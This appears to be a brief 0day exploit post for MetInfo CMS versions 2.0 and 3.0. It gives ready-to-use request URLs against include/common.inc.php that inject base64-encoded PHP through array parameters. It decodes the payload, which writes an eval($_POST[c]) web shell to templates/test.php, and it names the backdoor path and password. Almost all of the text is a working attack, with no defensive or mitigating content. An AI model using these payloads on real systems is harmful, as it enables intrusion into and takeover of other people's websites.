MetInfo2.0-3.0吃掉 0day

2.0

+poc:

include/common.inc.php?$class2_all_1[0]=[base64_encode(eval php code)]

+Exploit:/include/common.inc.php?$class2_all_1[0]=ZnB1dHMoZm9wZW4oJy4uL3RlbXBsYXRlcy90ZXN0LnBocCcsJ3crJyksJzw/cGhwIGV2YWwoJF9QT1NUW2NdKTs/PicpOw==

the encoded part is fputs(fopen('../templates/test.php','w+'),'<?php eval($_POST[c]);?>');

backdoor：http://site/templates/test.php                            password:c

-----------------------------------------------------------------------------------------

3.0

+POC：/include/common.inc.php?allclass[0]=[base64_encode(eval php code)]

+Exploit:/include/common.inc.php?allclass[0]=ZnB1dHMoZm9wZW4oJy4uL3RlbXBsYXRlcy90ZXN0LnBocCcsJ3crJyksJzw/cGhwIGV2YWwoJF9QT1NUW2NdKTs/PicpOw==

the encoded part is fputs(fopen('../templates/test.php','w+'),'<?php eval($_POST[c]);?>');